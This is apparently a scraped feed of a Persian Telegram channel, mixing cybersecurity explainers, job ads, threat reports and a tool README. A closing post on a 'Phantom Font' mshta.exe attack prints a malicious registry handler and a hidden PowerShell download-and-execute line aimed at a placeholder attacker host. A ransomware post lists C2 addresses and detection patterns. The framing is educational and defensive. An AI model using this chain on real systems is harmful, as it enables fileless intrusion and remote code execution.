Tricky Things About Proxy Requests(B)

2️⃣ 👀 نقش پراکسی معکوس و Intercepting Proxy در مبهم‌سازی زبان و مسیر درخواست‌ها

پراکسی‌هایی مثل Intercepting Proxy (مثلاً در تجهیزات شبکه یا تست ابزارهایی مثل Burp Suite)، یا پراکسی معکوس (Reverse Proxy)، می‌توانند:

هدرها را بازنویسی کنند

IP/Host اصلی را پنهان کنند

یا حتی زبان برنامه‌نویسی سمت سرور را برای کلاینت قابل تشخیص نکنند

✅ این موضوع برای باگ‌بانتی‌کاران مهم است چون ممکن است فکر کنند با یک سرور واقعی روبه‌رو هستند، در حالی که پشت پرده یک لایه پراکسی همه چیز را فیلتر می‌کند.

3️⃣ ✏️ اصلاح هوشمندانه URI توسط مرورگرها یا افزونه‌ها

برخی مرورگرها یا افزونه‌های آن‌ها به‌صورت خودکار تلاش می‌کنند URI ناقص یا اشتباه را "تصحیح" کنند.
مثلاً اگر آدرسی با /example داده شود، مرورگر ممکن است آن را به http://example.com/example تبدیل کند.

⚠️ در ترکیب با پراکسی، این رفتار می‌تواند باعث:

تغییر در مسیر اصلی درخواست

ایجاد حملات redirect/host header injection

بای‌پس برخی ruleهای WAF شود

4️⃣ 🌐 تأثیر زبان برنامه‌نویسی و دامنه‌ها در عملکرد پراکسی‌ها

برخی پراکسی‌ها مسیرها را بسته به زبان سمت سرور یا پسوند فایل‌ها متفاوت رفتار می‌دهند.
مثلاً مسیرهای php را differently rewrite می‌کنند یا cache policy برای js با json فرق دارد.

📌 دانستن این تفاوت‌ها برای اجرای موفق حملات XSS/Path Traversal یا اجرای payloadهای خاص بسیار مهم است.

🎯 نتیجه‌گیری:

هر باگ‌بانتی‌کار یا تحلیل‌گر امنیتی باید بداند:
«پراکسی فقط واسطه نیست، بلکه گاهی تصمیم‌گیرنده و تغییر‌دهنده‌ مسیر، ساختار و هویت درخواست‌هاست.»

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

#HTTP #Proxy #CyberSecurity

SANS SOC Survey 2025

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

تا زمانیکه برای نیرو ارزش قائل نباشید #مهاجرت خواهند کرد
چه بخواهید چه نخواهید

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

باج افزار BERT تهدید جدی برای دیتای شما! خیلی راحت رمزنگاری میکنه و داده ها رو ارسال میکنه! ⚠️ خیلی جاها رو آلوده کرده تا امروز ⚠️⛔️
تشخیص و کاهش اثر باج‌افزار BERT در محیط‌های ویندوز و لینوکس/ESXi
باج‌افزار BERT یک تهدید سایبری پیشرفته است که از آوریل ۲۰۲۵ محیط‌های ویندوز و لینوکس/ESXi را هدف قرار داده است. این باج‌افزار با رمزگذاری فایل‌ها (با پسوندهایی مانند .encryptedbybert یا .hellofrombert)، استخراج داده‌ها و ارسال به سرورهای فرمان و کنترل (C2) با آدرس‌های IP مانند 185.100.157.74 و 82.115.223.89، و غیرفعال‌سازی ماشین‌های مجازی ESXi، از مدل double-extortion بهره می‌برد. BERT با استفاده از ابزارهای قانونی مانند PowerShell و rclone، فعالیت‌های خود را مخفی نگه می‌دارد.

🔐 راهکارهای کاهش اثر تهدید

- محدودسازی دسترسی‌ها: غیرفعال‌سازی دسترسی‌های غیرضروری به Remote Desktop Protocol (RDP) و پیاده‌سازی احراز هویت چندمرحله‌ای (MFA).
- ایجاد نسخه‌های پشتیبان امن: تهیه نسخه‌های پشتیبان آفلاین و آزمایش فرآیندهای بازیابی به‌صورت دوره‌ای.
- پایش لاگ‌های امنیتی: بررسی رویدادهای Sysmon (با شناسه‌های EventID 1 و 11) و لاگ‌های syslog برای شناسایی دستورات مشکوک مانند esxcli vm process kill.
- استفاده از رول Sigma: رول Sigma با شناسه b2c3d4e5-f6a7-8901-bcde-2345678901fe برای تشخیص فرآیندهای مخرب، فایل‌های رمزگذاری‌شده، و اتصالات شبکه به سرورهای C2 طراحی شده است.
- آموزش کارکنان: برگزاری برنامه‌های آموزشی برای شناسایی ایمیل‌های فیشینگ و اجتناب از باز کردن پیوست‌های مشکوک.
- به‌کارگیری ابزارهای امنیتی: استفاده از راه‌حل‌های تشخیص و پاسخ نقطه پایانی (EDR) و ابزارهای تحلیل شبکه مانند Zeek برای شناسایی رفتارهای مشکوک.

🕵️ نحوه تشخیص تهدید

رول Sigma طراحی‌شده برای شناسایی فعالیت‌های BERT در محیط‌های ویندوز و لینوکس/ESXi، بر موارد زیر تمرکز دارد:

اجرای فرآیندهای مخرب مانند powershell.exe، newcryptor.exe، و payload.exe.
دستورات PowerShell مشکوک مانند DisableRealtimeMonitoring یا .downloadstring(.
فایل‌های رمزگذاری‌شده با پسوندهایی مانند .encryptedbybert و یادداشت‌های باج‌خواهی.
فعالیت‌های مخرب در ESXi مانند اجرای دستور esxcli vm process kill.
اتصالات شبکه به آدرس‌های IP سرورهای C2 (185.100.157.74، 82.115.223.89) و پورت‌های 3030 و 80.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

حمله چندلایه منتسب به ایران با سوءاستفاده از آسیب‌پذیری جدید Microsoft Server علیه زیرساخت‌های اسرائیل

تاریخ گزارش: هفته گذشته (طبق گزارش Financial Times)
نسبت‌دهی: چندین گروه APT وابسته به ایران
دامنه حمله: حدود ۵۰ سازمان اسرائیلی در حوزه‌های لجستیک، سوخت و منابع انسانی
بردار نفوذ: آسیب‌پذیری روزصفر (Zero-Day) در Microsoft Server (IIS / Exchange)

زنجیره حمله (TTPs)
دسترسی اولیه (Initial Access)
• تکنیک: اکسپلویت آسیب‌پذیری Microsoft Server در سرویس‌های IIS و Exchange
• MITRE ATT&CK: [T1203 – Exploitation for Client Execution]
• جزئیات: امکان اجرای کد از راه دور (RCE) با دسترسی سطح بالا و عبور از دفاع‌های محیطی.

فیشینگ و مهندسی اجتماعی (Phishing / Social Engineering)
• تکنیک: ارسال پیام هشدار اضطراری جعلی با ظاهر سامانه‌های امنیتی رسمی
• روش: Domain Spoofing جهت فریب کاربران
• MITRE ATT&CK: [T1194 – Spearphishing via Service]
• جزئیات: سرقت اعتبارنامه و تصاحب نشست‌های کاربری (Session Hijacking) از طریق پیام‌های با اولویت بالا.

نفوذ به IoT و سامانه‌های نظارت تصویری
(IoT & CCTV Compromise)
• تکنیک: استفاده از گذرواژه‌های پیش‌فرض و فریمورهای آسیب‌پذیر در تجهیزات
• سوءاستفاده از پروتکل: RTSP برای مشاهده زنده فید دوربین‌ها
• MITRE ATT&CK: [T1210 – Exploitation of Remote Services]
• جزئیات: ضعف ایمن‌سازی تجهیزات نظارتی باعث حرکت جانبی (Lateral Movement) به شبکه‌های عملیاتی شد.

عملیات تخریبی (Impact Operations)
• تکنیک‌ها:
• حملات DDoS علیه سامانه‌های هشدار و سرورهای C2 داخلی
• بدافزار توقف سرویس‌ها ([T1489 – Service Stop])
• دیفیس و تغییر داده‌های عملیاتی ([T1491 – Defacement])
• جزئیات: اختلال همزمان در زیرساخت دیجیتال و کارکرد عملیاتی سامانه‌ها.

جمع‌بندی ارزیابی
این حادثه یک عملیات ترکیبی سایبری–فیزیکی (Hybrid Cyber-Physical) محسوب می‌شود که از نفوذ در لایه IT آغاز و با تخریب و اختلال در سامانه‌های فیزیکی ادامه یافته است. توانایی مهاجم در ترکیب اکسپلویت زیرساخت سازمانی، نفوذ به تجهیزات IoT/OT و ایجاد اختلال عملیاتی نشان‌دهنده بلوغ عملیاتی بالاست.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🌟 Join Our Cutting-Edge Blockchain + AI Project
Looking for an expert in Hyperledger Fabric, Iroha, and AI integration to help us build a next-gen platform. Remote | Full-Time or Contract | Competitive Pay
📌 See PDF for full role denoscription & requirements.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

فرایند بوت شدن لینوکس
در بلاگ بعد این فرایند تشریح خواهد شد

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

#BOOT #Linux #OS #CyberSecurity

📢 فرآیند بوت لینوکس به زبان ساده 🐧

لینوکس چگونه بوت می‌شود؟ این تصویر به‌صورت خلاصه و گام‌به‌گام فرآیند بوت سیستم‌عامل لینوکس را نشان می‌دهد:

🔹 ۱. روشن‌کردن سیستم (Power On):

سیستم روشن می‌شود و سخت‌افزار اولیه فعال می‌گردد.

🔹 ۲. اجرای BIOS/UEFI:

تشخیص دستگاه‌های متصل (Detect Devices).

بارگذاری تنظیمات از حافظه غیرفرار (Load from non-volatile memory).

اجرای تست سلامت سخت‌افزار (POST).

🔹 ۳. بارگذاری GRUB:

خواندن فایل پیکربندی /etc/grub2.cfg.

اجرای کرنل لینوکس (Execute Kernel).

🔹 ۴. اجرای systemd (اولین پروسه در فضای کاربر):

بارگذاری کتابخانه‌های مورد نیاز (Load Supported Libraries).

اجرای فایل‌های هدف (Run Target Files) مانند:

default.target

multi-user.target

basic.target

getty.target

🔹 ۵. اجرای اسکریپت‌های راه‌اندازی:

/etc/profile

~/.bashrc

سرویس‌هایی مانند ssh.service و systemd-logind.

🔹 ۶. آماده‌سازی سیستم برای کاربران:

سیستم آماده ورود کاربران می‌شود (Users can login now).

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

#BOOT #Linux #OS #CyberSecurity

🛡 ۵۰ اصطلاح مهم دنیای امنیت سایبری که در ۲۰۲۵ باید بلد باشید!

✅ مفاهیم پایه امنیت:

🔸 CIA – محرمانگی، یکپارچگی، دسترس‌پذیری
🔸 APT – تهدید ماندگار پیشرفته
🔸 SOC – مرکز عملیات امنیت
🔸 SIEM – مدیریت اطلاعات و رویدادهای امنیتی
🔸 DLP – جلوگیری از نشت اطلاعات

🌐 امنیت شبکه و نقطه پایانی:

🔸 IDS – سیستم تشخیص نفوذ
🔸 IPS – سیستم جلوگیری از نفوذ
🔸 EDR – تشخیص و پاسخ نقطه پایانی
🔸 NAC – کنترل دسترسی به شبکه
🔸 UEBA – تحلیل رفتار کاربران و نهادها

🔐 مدیریت هویت و دسترسی:

🔸 IAM – مدیریت هویت و دسترسی
🔸 MFA – احراز هویت چندمرحله‌ای
🔸 SSO – ورود یکپارچه
🔸 RBAC – کنترل دسترسی مبتنی بر نقش
🔸 PAM – مدیریت دسترسی ممتاز

🧠 اطلاعات تهدید و بدافزار:

🔸 IOC – نشانگرهای نفوذ
🔸 TTP – تاکتیک‌ها، تکنیک‌ها، روش‌ها
🔸 MITRE ATT&CK – پایگاه دانش رفتارهای مهاجم
🔸 C2 – فرمان و کنترل
🔸 RAT – تروجان دسترسی از راه دور

☁️ امنیت وب، اپلیکیشن و فضای ابری:

🔸 WAF – فایروال اپلیکیشن وب
🔸 CASB – واسط امنیتی دسترسی به فضای ابری
🔸 SAST – تست امنیت ایستای کد
🔸 DAST – تست امنیت پویا
🔸 CSPM – مدیریت وضعیت امنیت فضای ابری

📋 ریسک و تطابق با قوانین:

🔸 GRC – حاکمیت، ریسک و انطباق
🔸 PII – اطلاعات شناسایی شخصی
🔸 GDPR – مقررات حفاظت از داده اتحادیه اروپا
🔸 HIPAA – قانون حفاظت اطلاعات سلامت
🔸 SOX – قانون ساربنز-آکسلی

🚨 واکنش به رخداد و تداوم کسب‌وکار:

🔸 IR – پاسخ به رخداد
🔸 BCP – برنامه تداوم کسب‌وکار
🔸 DRP – برنامه بازیابی از فاجعه
🔸 MTTR – میانگین زمان بازیابی
🔸 RTO – هدف زمان بازیابی

🧩 چارچوب‌های امنیت سایبری:

🔸 NIST – مؤسسه استانداردهای ملی آمریکا
🔸 ISO – سازمان بین‌المللی استانداردسازی
🔸 CIS – مرکز امنیت اینترنت
🔸 CMMC – گواهی بلوغ امنیت سایبری
🔸 COBIT – اهداف کنترلی برای فناوری اطلاعات

💣 تهدیدات و اکسپلویت‌ها:

🔸 DoS – حمله محروم‌سازی از سرویس
🔸 DDoS – حمله توزیع‌شده محروم‌سازی
🔸 XSS – اسکریپت‌نویسی بین سایتی
🔸 SQLi – تزریق SQL
🔸 MITM – مرد میانی

🚀 فناوری‌های نوظهور و ابزارهای امنیتی:

🔸 SOAR – ارکستراسیون و خودکارسازی امنیت
🔸 XDR – تشخیص و پاسخ گسترده
🔸 ZTA – معماری اعتماد صفر
🔸 SASE – دسترسی ایمن به لبه سرویس
🔸 CNAPP – پلتفرم حفاظت از اپلیکیشن‌های ابری بومی

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

#Blog #CyberSecurity

https://github.com/TryHackBox/Kaveh-WebDiff-Monitor
توضیحات ابزار :

این ابزار یک مانیتورینگ تغییرات و وضعیت HTTP است که برای بررسی سلامت سرویس‌های وب، مانیتورینگ Virtual Hostها و شناسایی تغییرات محتوا استفاده می‌شود.
با استفاده از این اسکریپت می‌توانید چندین IP/Port/Schema/Vhost را به صورت دوره‌ای بررسی کنید و در صورت تغییر وضعیت پاسخ یا تغییر در محتوای صفحه، هشدار دریافت کنید.

ویژگی‌ها

نظارت زمان‌بندی‌شده: اجرای خودکار در بازه‌های زمانی مشخص.

پشتیبانی از HTTP و HTTPS با امکان نادیده گرفتن خطاهای SSL.

Virtual Host Routing:
اتصال مستقیم به IP با هدر Host سفارشی (مناسب برای تست دامنه‌های روی یک سرور).

بررسی تغییر محتوا بر اساس تعداد کلمات و کد وضعیت HTTP.

ذخیره‌سازی وضعیت‌ها در فایل /tmp/http_mon.log برای مقایسه.

قابل استفاده در تست نفوذ برای شناسایی تغییرات، از کار افتادن سرویس یا تغییرات مشکوک.

نحوه اجرا در لینوکس

1. اسکریپت را کلون یا دانلود کنید:

   git clone https://github.com/TryHackBox/Kaveh-WebDiff-Monitor.git
   cd Kaveh-WebDiff-Monitor
   chmod +x Kaveh-Webdiff-Monitor.sh

2. یک فایل متنی شامل لیست اهداف ایجاد کنید (هر خط شامل IP، پورت، پروتکل و vhost):  
   192.168.1.10 443 https example.com
   10.0.0.5 80 http test.local
  

3. اجرای اسکریپت:

   ./Kaveh-Webdiff-Monitor.sh targets.txt

  
4. خروجی نمونه:
   Fri Aug 15 23:45:05 UTC 2025
   [*] 192.168.1.10 443 example.com: 200 157
   [*] 10.0.0.5 80 test.local: 404 12
   [!] تغییر وضعیت برای example.com
  
کاربرد در تست نفوذ

در فرایند تست نفوذ، این ابزار می‌تواند نقش مهمی داشته باشد:

شناسایی تغییرات در محتوای وب در زمان انجام حملات (مثلاً تغییر پیام خطا بعد از تزریق).

نظارت مداوم Virtual Hostها برای پیدا کردن دامنه‌های در حال توسعه یا فعال شدن سرویس‌های مخفی.

ردیابی پاسخ سرور بعد از تست‌های سنگین (مانند تست فشار یا ارسال حجم بالای درخواست ها).

شناسایی قطع سرویس یا تغییر پیکربندی در زمان حملات Man-in-the-Middle یا Bypass WAF.

کمک به فاز Post-Exploitation برای تشخیص تغییرات ایجادشده توسط شما یا تیم قرمز روی سیستم تارگت.

نکات

مسیر /tmp/http_mon.log در هر بار بوت ریست می‌شود؛ در صورت نیاز می‌توانید آن را به مسیر دائمی تغییر دهید.

برای استفاده در شبکه‌های بزرگ یا اسکن همزمان چند صد تارگت، پیشنهاد می‌شود بازه زمانی (INTERVAL) را متناسب افزایش دهید تا فشار روی سیستم تارگت کم شود.

این ابزار نیاز به curl و محیط Bash دارد.

اگر این ابزار براتون مفید بود استارز یادتون نشه
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

#فرصت_شغلی
#مانیتورینگ
#zabbix
#noc

سلام به دوستان و همکاران عزیز
یک شرکت خصوصی در حوزه ی بانکی ، جهت تکمیل نیروی فنی واحد مانیتورینگ شبکه و سرویس ، از افراد واجد شرایط زیر دعوت به همکاری می‌نماید:

عنوان شغلی: کارشناس توسعه ی مانیتورینگ

وظایف:
توسعه و نگهداری سامانه ی مانیتورینگ زبیکس

مهارت‌ها و توانایی‌ها:
تسلط بر نرم‌افزار مانیتورینگ Zabbix
توانایی مانیتور کردن شبکه و زیرساخت ، دیتابیس ها ، اپلیکیشن ها و سرویس ها با نرم‌افزار زبیکس
آشنایی با مفاهیم لینوکس در حد مدرک LPIC-1
آشنایی با ELK
توانایی تحلیل مشکلات شبکه و سرورها
دقت و مسئولیت‌پذیری بالا

آشنایی با دوره‌های splunk ، ccna و grafana مزیت محسوب‌ میشود.



لطفا رزومه ی خود را از طریق دایرکت لینکدین و یا سایت جابینجا ارسال بفرمایید.

https://jobinja.ir/1391768


🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

#دعوت_به_همکاری
با سلام ؛
مجموعه‌ی ارویس جهت تکمیل کادر فنی خود از کارشناسان واجد شرایط زیر دعوت به همکاری مینماید :

۱-تسلط به مباحث زیرساخت شبکه در سطح CCNP
۲-آشنا با فایروال ها از جمله Sophos و Fortigate
۳-آشنایی کلی با سرویس های ماکروسافتی
۴-اتمام و یا معافیت خدمت سربازی


مزایا:بیمه تکمیلی و ناهار
ساعت کاری : ۷ الی ۱۶

برای ارسال رزومه به شرکت تماس بگیرید

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

وقتی اعضای تیم #المپیادنجوم فهمیدند هر پنج نفر #طلا بردند.

اعضای تیم ایران در این رقابت‌ها شامل حسین سلطانی، هیربد فودازی، حسین معصومی، ارشیا میرشمسی کاخکی و علی نادری لردجانی هستند که توانستند با کسب ۵ نشان طلا، قهرمان مسابقات جهانی هند ۲۰۲۵ شوند.

امیدوارم عالی باشند و سالم

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🎯 حمله سایبری APT29 با C2 نامرئی – ترکیب CDN، HTTP/3 و DoH

در سال ۱۴۰۲، سازمان امنیت ملی آمریکا و شرکت امنیتی Mandiant اعلام کردند که گروه هکری APT29، وابسته به سرویس اطلاعات خارجی روسیه، موفق شده‌اند به یکی از نهادهای دیپلماتیک ایالات متحده نفوذ کنند.
آنچه این عملیات را به یکی از پیچیده‌ترین حملات سایبری اخیر تبدیل کرد، زیرساخت فرماندهی و کنترل (C2) آن بود که عملا از دید هر سیستم مانیتورینگ پنهان مانده بود.

فاز اول – پنهان‌سازی C2 پشت شبکه توزیع محتوا (CDN)

به جای استفاده از یک سرور C2 مستقیم، مهاجمان دامنه‌ای مشابه سرویس‌های به‌روزرسانی رسمی ثبت کردند و آن را از طریق Cloudflare به سرور واقعی خود مسیردهی کردند.
مزیت این کار:

تمام ارتباطات با C2 در قالب ترافیک HTTPS معتبر به یک CDN شناخته‌شده انجام می‌شد.
سیستم‌های امنیتی مقصد فقط «cloudflare.com» را به عنوان مقصد می‌دیدند.
امکان بلاک کردن ترافیک بدون اختلال گسترده در سرویس‌های دیگر تقریبا وجود نداشت.


فاز دوم – استفاده از پروتکل HTTP/3 مبتنی بر QUIC

به جای HTTP/1.1 یا HTTP/2، مهاجمان از HTTP/3 روی بستر QUIC بهره بردند.
این انتخاب چند مزیت حیاتی داشت:

برقراری ارتباط روی UDP/443 به جای TCP، که بسیاری از ابزارهای NIDS/IPS به‌خوبی آن را تحلیل نمی‌کنند.
رمزگذاری لایه حمل به شکلی که حتی پس از TLS Inspection، الگوهای ترافیکی شناسایی‌پذیر نباشند. امکان تغییر مسیر و زیرساخت با حداقل وقفه در صورت شناسایی.

فاز سوم – مخفی‌سازی درخواست‌های DNS با DoH

در این روش، درخواست‌های DNS سنتی روی پورت ۵۳ حذف شده و به جای آن از DNS over HTTPS استفاده شد.
به این ترتیب:

هر Query به شکل یک درخواست HTTPS رمزگذاری‌شده به سرور DoH (مثلاً cloudflare-dns.com) ارسال می‌شد.
هیچ لاگ قابل‌مشاهده‌ای در DNS Resolver سازمان مقصد وجود نداشت.
تشخیص دامنه‌های مخرب از روی ترافیک شبکه به‌شدت دشوار شد.

فاز چهارم – بارگذاری و اجرای Implant

مهاجمان از طریق فایل‌های فیشینگ (ISO یا Word با ماکرو)، یک Implant نوشته‌شده با Golang را روی سیستم قربانی مستقر کردند.
ویژگی‌های این Implant:

کراس‌پلتفرم بودن (Windows/Linux)
فشرده‌سازی با UPX برای جلوگیری از شناسایی توسط آنتی‌ویروس‌ها
برقراری Beacon نامنظم به دامنه C2 از طریق HTTP/3 و DoH
پشتیبانی از اجرای فرمان، استخراج فایل‌ها و حرکت جانبی (Lateral Movement) در شبکه داخلی

فاز پنجم – فرار از شناسایی

ترکیب این سه تکنیک (CDN + HTTP/3 + DoH) باعث شد:

ترافیک C2 با ترافیک عادی مرورگرها یکسان به نظر برسد.
ابزارهای امنیتی سنتی هیچ الگوی مشخصی از Beaconing پیدا نکنند.
حتی تحلیل‌گران SOC، بدون استفاده از روش‌های پیشرفته تحلیل متادیتا، نتوانند ارتباطات مخرب را از عادی تفکیک کنند.

روش‌های شکار (Threat Hunting)

برای مقابله با چنین حملاتی، نیاز به پایش سطح پیشرفته وجود دارد:

پروفایل‌سازی ترافیک QUIC و شناسایی ارتباطات غیرمرورگری روی UDP/443
بررسی Fingerprintهای TLS/JA3 و مقایسه با مرورگرهای استاندارد
تحلیل طول بسته‌ها و فواصل زمانی ارسال آن‌ها (Traffic Flow Analysis)
ایجاد لیست سفید برای سرورهای DoH و مسدودسازی موارد غیرمجاز

📌 نتیجه‌گیری:
این حمله نشان می‌دهد که گروه‌های پیشرفته (APT) دیگر نیازی به دامنه‌های مشکوک یا پورت‌های غیرمعمول ندارند.
امروز، زیرساخت‌های قانونی مثل Cloudflare، Akamai و پروتکل‌های مدرن مانند HTTP/3 و DoH می‌توانند به راحتی به سپر نامرئی برای C2 مهاجمان تبدیل شوند.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

ما در Barook | باروک دنبال یه نگهبان سایبری #Cyber_Security پرشور می‌گردیم!
اگر تو از اونایی هستی که با کشف یه آسیب‌پذیری ذوق می‌کنی، از خنثی کردن تهدیدات سایبری کیف می‌کنی و عاشق اینی که شبکه‌ها و سیستم‌ها رو مثل یه قلعه نفوذ ناپذیرکنی🛡، جای تو توی تیم ما خالیه!

🔶چی ازت می‌خوایم؟
🔹تسلط به ابزارهای امنیتی مثل Nessus، Nmap،فایروال‌ها و سیستم‌های SIEM
🔹تجربه واقعی کار با تهدیدات سایبری (نه فقط سناریوهای تمرینی)
🔹آشنایی با استانداردهای امنیتی مثل ISO 27001، NIST یا CIS
🔹مهارت تو تست نفوذ، تحلیل ریسک و مستندسازی حرفه‌ای
🔹خلاقیت تو پیدا کردن راهکارهای امنیتی و حل مسئله
🔹روحیه تیمی و توانایی کار تو محیط سریع و پرچالش

🔷چی برات داریم؟
🔸یه تیم باحال، حرفه‌ای و بدون حاشیه
🔸فضای رشد، یادگیری و دیده شدن ایده‌هات
🔸پروژه‌هایی که واقعاً امنیت سازمان رو متحول می‌کنن
🔸ساعت کاری منعطف و محیطی که توش راحتی

حس می‌کنی این شغل برات ساخته شده؟
بیا با هم دنیای سایبری رو امن‌تر کنیم!
📩 رزومه‌تو بفرست به لینک زیر یا یه پیام بده که بتونیم گپ بزنیم.
https://B2n.ir/yq7413
#استخدام
#کارشناس_امنیت_فناوری_اطلاعات
#IT_Security_Specialist
#Cyber_Security

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

سلام
تیم Ciclo (استارتاپ فعال گروه گلرنگ ونچرز) دنبال دو هم‌تیمی پرانرژی هست تا با هم مسیر رشد و توسعه اپلیکیشنمون رو جلو ببریم! اگر تجربه یا علاقه دارید تو فضای استارتاپی کار کنید، خوشحال می‌شیم پیام بدید.

موقعیت‌ها:
Front-end developer (React Native / PWA)
Back-end developer (Python / Django)

📩 رزومه‌تون رو می‌تونید به این آدرس بفرستید یا از طریق لینکدین با من در تماس باشید:
manihamzezadehz@gmail.com

#استخدام
#ریموت
#فرصت_شغلی
#استارتاپ
#Hiring
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

بعضی‌ها رسماً به مرحله‌ای رسیدن که دارن «چیزهای رایگان» رو هم می‌فروشن!

این روزها نسخه آماده #Nessus از طریق #Docker رایگان و در دسترس همه‌ست… ولی دیدم بعضی‌ها همین رو بسته‌بندی کردن و با قیمت بالا می‌دن به ملت 🤦‍♂️

هیچ جادوی خاصی پشتش نیست، فقط یک docker pull ساده‌ست!

واقعاً حیفه که وقت و پول مردم صرف چیزی بشه که با یک خط دستور میشه آورد بالا.

📂 لینک نسخه آماده روی Docker Hub:

https://hub.docker.com/r/sakurashiro/nessus

#nessus #docker #vulnerability_assessment #cybersecurity #infosec #soc #securitytools #redteam #blueteam #hide01

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

اگر تجربه کار با Laravel داری و زبان انگلیسیت خوبه,
جات توی تیم ما خالیه!
ما یک تیم استرالیایی هستیم که روی پروژه‌های بین‌المللی کار می‌کنیم و محیط کار کاملاً ریموت و دوستانه داریم.
شرایط کلی:
تسلط به Laravel و PHP
مهارت‌های خوب انگلیسی برای ارتباط با تیم و کلاینت‌ها
تعهد و روحیه تیمی
محل کار: ریموت (تمام‌وقت)
حقوق: بر اساس مهارت و تجربه
اگر علاقه‌مند هستید، فرم زیر را پر کنید تا با شما تماس بگیریم:

https://docs.google.com/forms/d/e/1FAIpQLScCvHwuSESc6tL9XuojivlSNWEVTJKNbMCr6E0Gpmrk3QyqiQ/viewform?usp=dialog

#استخدام #آگهي_شغلي #دوركاري #ريموت #برنامه_نويسي #فرصت_شغلي #لاراول #laravel #php

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد می‌شود!

یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم می‌توانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!



🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟

پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایل‌های hta (HTML Application) طراحی شده است.
این فایل‌ها می‌توانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا می‌کند.

📌 محل پیش‌فرض:
C:\\Windows\\System32\\mshta.exe



چرا مهاجمان عاشق mshta.exe هستند؟

✅ به‌صورت پیش‌فرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتی‌ویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه



📌 نمونه استفاده مخرب:


mshta.exe "javanoscript​ : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"




🧩 مراحل حمله فونت شبح:

1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت می‌کند (مثلاً CorpSans.ttf)
اما به‌جای فونت، یک فایل مشکوک .reg را دانلود می‌کند.

2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام fontview:// تعریف می‌کند.
و می‌گوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:


[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javanoscript​:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""


3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به fontview://load ریدایرکت می‌شود.
پراسس mshta.exe اجرا می‌شود، مقدار Payload از رجیستری خوانده می‌شود و PowerShell مخفیانه اجرا می‌شود:

javanoscript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);




🔍 چرا این حمله خطرناک است؟

✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا به‌صورت Stealth (بدون پنجره و هشدار)



🛡 نکات مهم برای Blue Team:

🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید
🔸 هر اجرای ناگهانی mshta بدون فایل .hta را بررسی کنید
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک



🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!

#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer